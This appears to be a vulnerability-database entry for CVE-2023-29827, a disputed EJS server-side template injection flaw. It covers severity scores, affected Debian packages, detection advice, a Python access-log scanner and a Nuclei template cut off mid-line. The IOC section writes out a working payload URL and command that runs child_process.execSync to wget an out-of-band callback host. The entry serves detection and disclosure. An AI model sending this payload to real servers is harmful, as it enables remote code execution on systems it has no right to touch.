CVE-2023-29827
Published 2023-05-04
Priority P263 · critical · 9.8 CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: EPSS 5.55% (91.9th percentile)
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-ejs | — | — |
| ejs | ejs | >= 3.1.9 | — |
Detection & IOCs
URL: {{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//
Command: process.mainModule.require('child_process').execSync('wget http://{{interactsh-url}}');
- Detect SSTI exploitation attempts against EJS via the `closeDelimiter` parameter in the `view options` settings object passed through HTTP query parameters.
- Look for HTTP GET requests containing `settings[view%20options][closeDelimiter]` or `settings[view options][closeDelimiter]` in the query string as a strong indicator of CVE-2023-29827 exploitation.
- Monitor for out-of-band HTTP interactions (e.g., interactsh/OAST callbacks) triggered from Node.js processes, which may indicate successful RCE via EJS SSTI.
- Flag any Node.js process invoking `process.mainModule.require('child_process').execSync` originating from a web request handler, as this is the canonical payload pattern for this CVE.
- The vulnerability is disputed by the EJS vendor; the render function is explicitly documented as not intended for use with untrusted input. Detection should be tuned to environments where user-controlled input reaches EJS render calls.
- The Nuclei template targets a specific response body string to confirm exploitability; detections should also check for this application-specific response to reduce false positives.
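The query-string indicator above, implemented as a log scanner (an added example, not code from the page, the EJS project or the Nuclei template). It normalises percent-encoding, `+` and double-encoding before matching, and matches the `[view options][closeDelimiter]` key path under any top-level parameter name, not only `settings`, since that outer name is specific to the PoC target; the access-log lines are constructed for the example.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (not from the page). Lines 1-2 carry the
# closeDelimiter key path in two encodings; lines 3-4 are benign look-alikes.
SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2023:10:01:13 +0000] "GET /page?settings[view%20options][closeDelimiter]=x HTTP/1.1" 200 512
203.0.113.7 - - [04/May/2023:10:01:20 +0000] "GET /page?opts%5Bview+options%5D%5BcloseDelimiter%5D=x HTTP/1.1" 200 512
198.51.100.9 - - [04/May/2023:10:02:01 +0000] "GET /page?settings[view%20options][cache]=true HTTP/1.1" 200 512
198.51.100.9 - - [04/May/2023:10:02:05 +0000] "GET /search?q=closeDelimiter HTTP/1.1" 200 128
"""

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Key path that reaches the EJS "view options" object and its closeDelimiter setting.
KEY_PATH_RE = re.compile(r"\[\s*view options\s*\]\s*\[\s*closedelimiter\s*\]", re.IGNORECASE)


def suspicious_params(target: str) -> list[str]:
    """Return decoded query-parameter names whose key path ends in [view options][closeDelimiter]."""
    query = urlsplit(target).query
    hits: list[str] = []
    # parse_qsl already decodes %XX and '+' once; a second unquote_plus catches
    # double-encoded keys (e.g. %255B) that a naive substring match would miss.
    for raw_key, _value in parse_qsl(query, keep_blank_values=True):
        key = unquote_plus(raw_key)
        if KEY_PATH_RE.search(key):
            hits.append(key)
    return hits


def scan_access_log(log_text: str) -> list[dict]:
    """Flag log entries whose request target carries the closeDelimiter key path."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        keys = suspicious_params(m.group("target"))
        if keys:
            findings.append({"line": lineno, "client": line.split(" ", 1)[0],
                             "method": m.group("method"), "keys": keys})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A hit is only a strong indicator, not proof of compromise: pair it with the out-of-band callback and `child_process` checks listed above before escalating.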
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | LOW | — |
GHSA
GHSA-j5pp-6f4w-r5r6: ejs v3
ghsa_unreviewed · 2023-05-04 · CRITICAL · CWE-74
OSV
CVE-2023-29827: ejs v3
osv · 2023-05-04 · CVSS 9.8 · CRITICAL

OSV
CVE-2023-29827: ** DISPUTED ** ejs v3
osv · 2023-05-04 · CVSS 9.8 · CRITICAL
Debian
CVE-2023-29827: node-ejs - ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is c...
vendor_debian · 2023 · CVSS 9.8 · CRITICAL
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
No detection rules found.
Nuclei
Embedded JavaScript(EJS) 3.1.6 - Template Injection
nuclei · CVSS 9.8 · CRITICAL
Template:

```yaml
id: CVE-2023-29827

info:
  name: Embedded JavaScript(EJS) 3.1.6 - Template Injection
  author: ritikchaddha
  severity: critical
  description: |
    ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.
  impact: |
    High impact as it enables remote code execution.
  remediation: |
    Update EJS to the latest version to mitigate the vulnerability.
  reference:
    - https://github.com/mde/ejs/issues/720
    - https:/
```